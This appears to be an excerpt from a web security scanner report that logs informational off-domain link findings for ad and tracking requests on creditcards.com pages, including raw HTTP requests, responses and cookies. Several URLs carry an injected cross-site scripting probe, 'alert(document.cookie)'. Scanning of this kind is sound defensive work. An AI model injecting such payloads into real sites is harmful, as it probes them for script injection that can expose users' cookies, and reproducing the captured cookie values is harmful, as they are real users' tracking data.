http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://blogs.creditcards.com/fine-print/%253F3cf6d%252522-alert(document.cookie)-%252522cf7270b0551%253D1%26hl%3Den%26client%3Dca-pub-3561925617094932%26adU%3DRefinance.MortgageLoan.com%26adT%3D2.3%2525%2BRefinance%2BRates%26adU%3Dwww.CapitalOne.com%26adT%3DCapital%2BOne%25C2%25AE%2BCredit%2BCard%26gl%3DUS&usg=AFQjCNFAtKQjN8gvsCGH0etnhDqIGen0DA

Request

GET /pagead/ads?client=ca-pub-3561925617094932&output=html&h=60&slotname=7084479809&w=468&lmt=1308330672&flash=10.3.181&url=http%3A%2F%2Fblogs.creditcards.com%2Ffine-print%2F%3F3cf6d%2522-alert(document.cookie)-%2522cf7270b0551%3D1&dt=1308312672124&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=7157486477&correlator=1308312670694&frm=4&adk=616904430&ga_vid=526911810.1308312671&ga_sid=1308312671&ga_hid=970325886&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1049&bih=893&ref=http%3A%2F%2Fburp%2Fshow%2F6&fu=0&ifi=2&dtd=72&xpc=BkYCvQVw2P&p=http%3A//blogs.creditcards.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 17 Jun 2011 12:11:11 GMT
Server: cafe
Cache-Control: private
Content-Length: 10790
X-XSS-Protection: 1; mode=block

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000aa;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://blogs.creditcards.com/fine-print/%253F3cf6d%252522-alert(document.cookie)-%252522cf7270b0551%253D1%26hl%3Den%26client%3Dca-pub-3561925617094932%26adU%3DRefinance.MortgageLoan.com%26adT%3D2.3%2525%2BRefinance%2BRates%26adU%3Dwww.CapitalOne.com%26adT%3DCapital%2BOne%25C2%25AE%2BCredit%2BCard%26gl%3DUS&usg=AFQjCNFAtKQjN8gvsCGH0etnhDqIGen0DA" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

15.22. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3561925617094932&output=html&h=60&slotname=7084479809&w=468&lmt=1308312692&flash=0&url=http%3A%2F%2Fblogs.creditcards.com%2Ffine-print%2F%3F3cf6d%2522-alert(document.cookie)-%2522cf7270b0551%3D1&dt=1308312704963&bpp=29&shv=r20110608&jsv=r20110607&prev_slotnames=7157486477&correlator=1308312704782&frm=4&adk=616904430&ga_vid=1333040603.1308312709&ga_sid=1308312709&ga_hid=1529775446&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&u_nplug=5&u_nmime=38&biw=1048&bih=782&eid=33895142&ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&fu=0&ifi=2&dtd=8482&xpc=H0Wa3KD4zr&p=http%3A//blogs.creditcards.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://blogs.creditcards.com/fine-print/%253F3cf6d%252522-alert(document.cookie)-%252522cf7270b0551%253D1%26hl%3Den%26client%3Dca-pub-3561925617094932%26adU%3Dwww.WalmartMoneyCard.com/getacard%26adT%3DWalmart%2BPrepaid%2BVisa%2BCard%26adU%3Dwww.ConstantContact.com%26adT%3DConstant%2BContact%2B%25C2%25AE%26gl%3DUS&usg=AFQjCNE8IMsO-M5Jp7kPNwDqrn_K3HFg2A

Request

GET /pagead/ads?client=ca-pub-3561925617094932&output=html&h=60&slotname=7084479809&w=468&lmt=1308312692&flash=0&url=http%3A%2F%2Fblogs.creditcards.com%2Ffine-print%2F%3F3cf6d%2522-alert(document.cookie)-%2522cf7270b0551%3D1&dt=1308312704963&bpp=29&shv=r20110608&jsv=r20110607&prev_slotnames=7157486477&correlator=1308312704782&frm=4&adk=616904430&ga_vid=1333040603.1308312709&ga_sid=1308312709&ga_hid=1529775446&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&u_nplug=5&u_nmime=38&biw=1048&bih=782&eid=33895142&ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&fu=0&ifi=2&dtd=8482&xpc=H0Wa3KD4zr&p=http%3A//blogs.creditcards.com HTTP/1.1
Host: googleads.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://blogs.creditcards.com/fine-print/?3cf6d%22-alert(document.cookie)-%22cf7270b0551=1
Cookie: id=c60bd0733000097|2703878/1001371/15138,3226301/1106615/15127|t=1297260501|et=730|cs=g_qf15ye; rsi_segs=E11178_10001

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 17 Jun 2011 12:11:55 GMT
Server: cafe
Cache-Control: private
Content-Length: 11069
X-XSS-Protection: 1; mode=block

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000aa;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://blogs.creditcards.com/fine-print/%253F3cf6d%252522-alert(document.cookie)-%252522cf7270b0551%253D1%26hl%3Den%26client%3Dca-pub-3561925617094932%26adU%3Dwww.WalmartMoneyCard.com/getacard%26adT%3DWalmart%2BPrepaid%2BVisa%2BCard%26adU%3Dwww.ConstantContact.com%26adT%3DConstant%2BContact%2B%25C2%25AE%26gl%3DUS&usg=AFQjCNE8IMsO-M5Jp7kPNwDqrn_K3HFg2A" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

15.23. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3561925617094932&output=html&h=90&slotname=7157486477&w=728&lmt=1308329972&flash=10.3.181&url=http%3A%2F%2Fblogs.creditcards.com%2Ffine-print%2F&dt=1308311972312&bpp=1&shv=r20110608&jsv=r20110607&correlator=1308311972399&frm=4&adk=2114403254&ga_vid=1977312224.1308311973&ga_sid=1308311973&ga_hid=683643976&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1049&bih=893&ref=http%3A%2F%2Fblogs.creditcards.com%2F&fu=0&ifi=1&dtd=418&xpc=zFI7KhULCH&p=http%3A//blogs.creditcards.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://blogs.creditcards.com/fine-print/%26hl%3Den%26client%3Dca-pub-3561925617094932%26adU%3Dwww.CapitalOne.com%26adT%3DCapital%2BOne%25C2%25AE%2BCredit%2BCard%26adU%3Dwww.NetSpend.com%26adT%3DPrepaid%2BVisa%2BCredit%2BCard%26adU%3Dwww.FastDebtSettlements.com%26adT%3DDebt%2BSettlement%2BPlans%26gl%3DUS&usg=AFQjCNFXFWVVG-fzZQ93kNlsEkwaXHqKgg

Request

GET /pagead/ads?client=ca-pub-3561925617094932&output=html&h=90&slotname=7157486477&w=728&lmt=1308329972&flash=10.3.181&url=http%3A%2F%2Fblogs.creditcards.com%2Ffine-print%2F&dt=1308311972312&bpp=1&shv=r20110608&jsv=r20110607&correlator=1308311972399&frm=4&adk=2114403254&ga_vid=1977312224.1308311973&ga_sid=1308311973&ga_hid=683643976&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1049&bih=893&ref=http%3A%2F%2Fblogs.creditcards.com%2F&fu=0&ifi=1&dtd=418&xpc=zFI7KhULCH&p=http%3A//blogs.creditcards.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 17 Jun 2011 11:59:34 GMT
Server: cafe
Cache-Control: private
Content-Length: 14084
X-XSS-Protection: 1; mode=block

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#000066;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://blogs.creditcards.com/fine-print/%26hl%3Den%26client%3Dca-pub-3561925617094932%26adU%3Dwww.CapitalOne.com%26adT%3DCapital%2BOne%25C2%25AE%2BCredit%2BCard%26adU%3Dwww.NetSpend.com%26adT%3DPrepaid%2BVisa%2BCredit%2BCard%26adU%3Dwww.FastDebtSettlements.com%26adT%3DDebt%2BSettlement%2BPlans%26gl%3DUS&usg=AFQjCNFXFWVVG-fzZQ93kNlsEkwaXHqKgg" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

15.24. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3561925617094932&output=html&h=90&slotname=7157486477&w=728&lmt=1308312692&flash=0&url=http%3A%2F%2Fblogs.creditcards.com%2Ffine-print%2F%3F3cf6d%2522-alert(document.cookie)-%2522cf7270b0551%3D1&dt=1308312702590&bpp=32&shv=r20110608&jsv=r20110607&correlator=1308312704782&frm=4&adk=2114403254&ga_vid=1333040603.1308312709&ga_sid=1308312709&ga_hid=1529775446&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&u_nplug=5&u_nmime=38&biw=1048&bih=782&eid=33895142&ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&fu=0&ifi=1&dtd=6375&xpc=LfQ5d8AFhK&p=http%3A//blogs.creditcards.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://blogs.creditcards.com/fine-print/%253F3cf6d%252522-alert(document.cookie)-%252522cf7270b0551%253D1%26hl%3Den%26client%3Dca-pub-3561925617094932%26adU%3Dwww.CapitalOne.com%26adT%3DCapital%2BOne%25C2%25AE%2BCredit%2BCard%26adU%3Dwww.WalmartMoneyCard.com/getacard%26adT%3DWalmart%2BPrepaid%2BVisa%2BCard%26adU%3Damericanexpress.com/Rewards%26adT%3DAmerican%2BExpress%25C2%25AE%2BRewards%26gl%3DUS&usg=AFQjCNFFnz3P3V3SxppBQJ7T5YgUsygawA

Request

GET /pagead/ads?client=ca-pub-3561925617094932&output=html&h=90&slotname=7157486477&w=728&lmt=1308312692&flash=0&url=http%3A%2F%2Fblogs.creditcards.com%2Ffine-print%2F%3F3cf6d%2522-alert(document.cookie)-%2522cf7270b0551%3D1&dt=1308312702590&bpp=32&shv=r20110608&jsv=r20110607&correlator=1308312704782&frm=4&adk=2114403254&ga_vid=1333040603.1308312709&ga_sid=1308312709&ga_hid=1529775446&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&u_nplug=5&u_nmime=38&biw=1048&bih=782&eid=33895142&ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&fu=0&ifi=1&dtd=6375&xpc=LfQ5d8AFhK&p=http%3A//blogs.creditcards.com HTTP/1.1
Host: googleads.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://blogs.creditcards.com/fine-print/?3cf6d%22-alert(document.cookie)-%22cf7270b0551=1
Cookie: id=c60bd0733000097|2703878/1001371/15138,3226301/1106615/15127|t=1297260501|et=730|cs=g_qf15ye; rsi_segs=E11178_10001

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 17 Jun 2011 12:11:51 GMT
Server: cafe
Cache-Control: private
Content-Length: 14080
X-XSS-Protection: 1; mode=block

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#000066;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://blogs.creditcards.com/fine-print/%253F3cf6d%252522-alert(document.cookie)-%252522cf7270b0551%253D1%26hl%3Den%26client%3Dca-pub-3561925617094932%26adU%3Dwww.CapitalOne.com%26adT%3DCapital%2BOne%25C2%25AE%2BCredit%2BCard%26adU%3Dwww.WalmartMoneyCard.com/getacard%26adT%3DWalmart%2BPrepaid%2BVisa%2BCard%26adU%3Damericanexpress.com/Rewards%26adT%3DAmerican%2BExpress%25C2%25AE%2BRewards%26gl%3DUS&usg=AFQjCNFFnz3P3V3SxppBQJ7T5YgUsygawA" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

15.25. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3561925617094932&output=html&h=90&slotname=7157486477&w=728&lmt=1308329943&flash=10.3.181&url=http%3A%2F%2Fblogs.creditcards.com%2F&dt=1308311938262&bpp=3&shv=r20110608&jsv=r20110607&correlator=1308311943903&frm=4&adk=2114403254&ga_vid=305312364.1308311945&ga_sid=1308311945&ga_hid=969897588&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1049&bih=893&eid=33895142&ref=http%3A%2F%2Fwww.creditcards.com%2Fpoints-rewards.php&fu=0&ifi=1&dtd=6397&xpc=wxkaSGm8f2&p=http%3A//blogs.creditcards.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://blogs.creditcards.com/%26hl%3Den%26client%3Dca-pub-3561925617094932%26adU%3Dwww.AcclaimVisa.com/Unsecured_Card%26adT%3DGet%2BUnsecured%2BCredit%2BCard%26adU%3Dwww.Low-Rate-Credit-Cards.com/Poor%26adT%3DBad%2BCredit%2B-%2BHigh%2BLimit%26adU%3Dwww.low-interest-credit-cards.com%26adT%3DHigh%2BLimit%2B%2526amp%253B%2BBad%2BCredit%26gl%3DUS&usg=AFQjCNGHSQmczHoDC__RYvNoMQ-hDSDF5A

Request

GET /pagead/ads?client=ca-pub-3561925617094932&output=html&h=90&slotname=7157486477&w=728&lmt=1308329943&flash=10.3.181&url=http%3A%2F%2Fblogs.creditcards.com%2F&dt=1308311938262&bpp=3&shv=r20110608&jsv=r20110607&correlator=1308311943903&frm=4&adk=2114403254&ga_vid=305312364.1308311945&ga_sid=1308311945&ga_hid=969897588&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1049&bih=893&eid=33895142&ref=http%3A%2F%2Fwww.creditcards.com%2Fpoints-rewards.php&fu=0&ifi=1&dtd=6397&xpc=wxkaSGm8f2&p=http%3A//blogs.creditcards.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 17 Jun 2011 11:59:06 GMT
Server: cafe
Cache-Control: private
Content-Length: 13599
X-XSS-Protection: 1; mode=block

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#000066;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://blogs.creditcards.com/%26hl%3Den%26client%3Dca-pub-3561925617094932%26adU%3Dwww.AcclaimVisa.com/Unsecured_Card%26adT%3DGet%2BUnsecured%2BCredit%2BCard%26adU%3Dwww.Low-Rate-Credit-Cards.com/Poor%26adT%3DBad%2BCredit%2B-%2BHigh%2BLimit%26adU%3Dwww.low-interest-credit-cards.com%26adT%3DHigh%2BLimit%2B%2526amp%253B%2BBad%2BCredit%26gl%3DUS&usg=AFQjCNGHSQmczHoDC__RYvNoMQ-hDSDF5A" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

15.26. http://tags.bluekai.com/site/2939 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/2939

Issue detail

The page was loaded from a URL containing a query string:

http://tags.bluekai.com/site/2939?ret=html&phint=keywords%3DBusiness%20Credit%20Cards%2C%20small%20business%20credit%20cards%2C%20home%2C%20best%2C%20credit%20card%2C%20credit%20cards%2C%20apply%2C%20online%2C%20application%2C%20applications&phint=__bk_t%3DBusiness%20Credit%20Cards%20-%20CreditCards.com&phint=__bk_k%3DBusiness%20Credit%20Cards%2C%20small%20business%20credit%20cards%2C%20home%2C%20best%2C%20credit%20card%2C%20credit%20cards%2C%20apply%2C%20online%2C%20application%2C%20applications&limit=4&r=32344732

The response contains the following links to other domains:

http://ad.yieldmanager.com/pixel?adv=60652&code=AS12329&t=2&rnd=843979792
http://ads.bluelithium.com/pixel?adv=23351&code=BKPGGMMSBV2&t=2&rnd=35636724

Request

GET /site/2939?ret=html&phint=keywords%3DBusiness%20Credit%20Cards%2C%20small%20business%20credit%20cards%2C%20home%2C%20best%2C%20credit%20card%2C%20credit%20cards%2C%20apply%2C%20online%2C%20application%2C%20applications&phint=__bk_t%3DBusiness%20Credit%20Cards%20-%20CreditCards.com&phint=__bk_k%3DBusiness%20Credit%20Cards%2C%20small%20business%20credit%20cards%2C%20home%2C%20best%2C%20credit%20card%2C%20credit%20cards%2C%20apply%2C%20online%2C%20application%2C%20applications&limit=4&r=32344732 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/business.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=cQ6991Cf6W6Oh0NB; bklc=4dfb282e; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101UbZ22LUv1790oYUsJIj/LBQjsOGSsO3SsoGSVHrRsaZjsCAjQ/AeY6BnxhQikZ9iGkHYyYfRHok; bkst=KJhBAnNn96WxhqzxaJmQ/BQGRZsfmgw4iTVWs9vHvWcOonpqFx1PGCRhRstF+FqVGgPPdQ/qLqED5aSYtMQUsbzSlFLhfpWEfcsS6xy4UkGEqWMfY7B83MmjOm8A/gAv/KWrJoqqUsx3XXRGaXH2yEXHwX7bFSwKXSelF4oe6Q5JzXyoqfxW/flxDZM+ycxFUXZKvHPoNhLatiGP3axsx91S2W/bJHahbFtBf/+uDDqaYeRBMZ4KoCpHOu8MagCBU5YO/iCZqPpIkFQaP3FV5IFqKp+Zzf25mttzhXaJ/yIBybNRFHAl3JEdDQDGNWJo9PHEQ+w+XjVkYZBk8LfYxqd5qcDbpKfXTGM6j2vUsxG7DILaG9xWQOuuiOO/eiRU0kEriCrMu+WXKoBRopnrwYOUBZqzh6CqfMWJ3DuBu7NIWqXIIIIBPduqU6DWjfz=; bk=MIsfaFBauOud8JkA; bkc=KJh566N/PaWDOded6hZd0CaeYCyjQ+xRwXSHxYQCAHju1nxSZRDiukZTPXHHDQRl/TvMPYeuHZyMPevgVQHJ/YNqHDa+NWaCW1zyH3UG7wKXpM+7X5fMhpldIdUrMPXYxZaQ+KLLDGHuPJWp4T9DtxJLwfQklKzomWfIPtJCvlxVvzaet6ds/ByDkQT3+dikrUIli0c2trI1PTxKttFvrUW/jTKAd5KA68udlNjRpXRDzOo0d1yn8sm6J0TwKvEfUsbA80fkgI05H/v/K+Z2axV4IGeIfhj30nlTRqaM0ks358FfBIqIGr42lDEVcGdqM4zg3UlBxFfQCBRULw6IYVsrB2bAuqI+OEqJwcdtstVrBNb7L5Bo/cO6EwZww7q7geEUsdX+OK3cQUrw7EpfCMnUslLodtD5IWo8TXdvA0Fu/XGp02/gnbPl7A+7k3Hdv72EgkrDgkSrPwRGhNwuGdwurRH6KT66f84hmdnVJfoMniXgUbIU8ghhXevxcnYxpHUXNYX2g1h8T6abFjGe+Qd84pFZ5rm0zr9U7RdZ9bKKwE1ZwSl1KK1U5wk2mhjSbFRFUvczsoeIEK4nfuwk7wnWcKA084h+bDwkUKPDCduY13dwrJpIhyzb7N554ouxfobV832hQm8pg1WupMqv5CfwIeIdwVYf; bko=KJ0ETtBQucUXfzFW1/ZBQVsYdV24UGRZeQRsEltxtWHrsWLjvc+zffzF/XBonCCgCpYWhzuQ0Q+CYEJTXXnWNvWL4GjRxxinZKWLBTEayCemegHUdC4xaOtQvEdKdxu0YGc3n7fbYZEo1DBR79y1xeW+LBQ5GcAb1iIOKrmW/YyZCAuGsY+ew+9X8C4wQKGuKOQRToTX923ZOV55TGKyQnqhykiuxJIdYfTakJDaLQ/tUQKSe9YRqWKu; 